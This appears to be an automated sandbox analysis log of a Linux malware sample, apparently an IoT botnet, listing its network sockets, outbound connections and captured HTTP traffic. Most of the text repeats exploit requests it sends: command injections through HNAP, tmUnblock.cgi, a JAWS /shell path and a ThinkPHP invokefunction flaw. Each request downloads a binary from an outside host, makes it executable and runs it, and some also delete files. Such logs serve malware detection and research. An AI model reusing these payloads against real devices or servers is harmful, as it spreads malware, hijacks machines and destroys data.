Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:

Source: /tmp/4lXTg8P7Ih.elf (PID: 6225)	Socket: 127.0.0.1::28688	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	Socket: 0.0.0.0::4650	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	Socket: 0.0.0.0::23	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	Socket: 0.0.0.0::0	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	Socket: 0.0.0.0::80	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	Socket: 0.0.0.0::3001	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	Socket: 0.0.0.0::48101	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	Socket: 0.0.0.0::4321	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	Socket: 0.0.0.0::6667	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	Socket: 0.0.0.0::6697	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	Socket: 0.0.0.0::4102	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	Socket: 0.0.0.0::1312	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	Socket: 0.0.0.0::1676	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	Socket: 0.0.0.0::34712	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	Socket: 0.0.0.0::4267	Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 142.81.204.155
Source: unknown	TCP traffic detected without corresponding DNS query: 158.183.105.155
Source: unknown	TCP traffic detected without corresponding DNS query: 200.31.234.92
Source: unknown	TCP traffic detected without corresponding DNS query: 18.166.174.216
Source: unknown	TCP traffic detected without corresponding DNS query: 141.237.141.234
Source: unknown	TCP traffic detected without corresponding DNS query: 158.137.220.32
Source: unknown	TCP traffic detected without corresponding DNS query: 197.93.176.238
Source: unknown	TCP traffic detected without corresponding DNS query: 190.205.127.222
Source: unknown	TCP traffic detected without corresponding DNS query: 98.2.246.120
Source: unknown	TCP traffic detected without corresponding DNS query: 80.241.148.27
Source: unknown	TCP traffic detected without corresponding DNS query: 32.115.116.235
Source: unknown	TCP traffic detected without corresponding DNS query: 9.3.135.129
Source: unknown	TCP traffic detected without corresponding DNS query: 18.105.108.184
Source: unknown	TCP traffic detected without corresponding DNS query: 161.5.112.230
Source: unknown	TCP traffic detected without corresponding DNS query: 220.101.179.130
Source: unknown	TCP traffic detected without corresponding DNS query: 198.60.231.13
Source: unknown	TCP traffic detected without corresponding DNS query: 95.180.139.40
Source: unknown	TCP traffic detected without corresponding DNS query: 102.149.226.148
Source: unknown	TCP traffic detected without corresponding DNS query: 158.84.203.49
Source: unknown	TCP traffic detected without corresponding DNS query: 66.53.172.173
Source: unknown	TCP traffic detected without corresponding DNS query: 212.143.7.245
Source: unknown	TCP traffic detected without corresponding DNS query: 23.238.20.184
Source: unknown	TCP traffic detected without corresponding DNS query: 181.225.190.47
Source: unknown	TCP traffic detected without corresponding DNS query: 64.13.32.104
Source: unknown	TCP traffic detected without corresponding DNS query: 66.32.12.85
Source: unknown	TCP traffic detected without corresponding DNS query: 154.73.166.30
Source: unknown	TCP traffic detected without corresponding DNS query: 157.183.195.216
Source: unknown	TCP traffic detected without corresponding DNS query: 173.203.205.10
Source: unknown	TCP traffic detected without corresponding DNS query: 150.87.68.127
Source: unknown	TCP traffic detected without corresponding DNS query: 147.213.105.248
Source: unknown	TCP traffic detected without corresponding DNS query: 151.76.239.213
Source: unknown	TCP traffic detected without corresponding DNS query: 107.228.97.160
Source: unknown	TCP traffic detected without corresponding DNS query: 76.121.121.101
Source: unknown	TCP traffic detected without corresponding DNS query: 216.23.233.195
Source: unknown	TCP traffic detected without corresponding DNS query: 13.235.179.64
Source: unknown	TCP traffic detected without corresponding DNS query: 125.12.253.93
Source: unknown	TCP traffic detected without corresponding DNS query: 159.132.133.50
Source: unknown	TCP traffic detected without corresponding DNS query: 80.69.108.27
Source: unknown	TCP traffic detected without corresponding DNS query: 220.124.175.245
Source: unknown	TCP traffic detected without corresponding DNS query: 161.47.26.21
Source: unknown	TCP traffic detected without corresponding DNS query: 159.147.138.115
Source: unknown	TCP traffic detected without corresponding DNS query: 173.212.43.152
Source: unknown	TCP traffic detected without corresponding DNS query: 150.97.141.103
Source: unknown	TCP traffic detected without corresponding DNS query: 102.247.56.52
Source: unknown	TCP traffic detected without corresponding DNS query: 63.164.181.212
Source: unknown	TCP traffic detected without corresponding DNS query: 74.149.178.253
Source: unknown	TCP traffic detected without corresponding DNS query: 118.233.92.217

Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
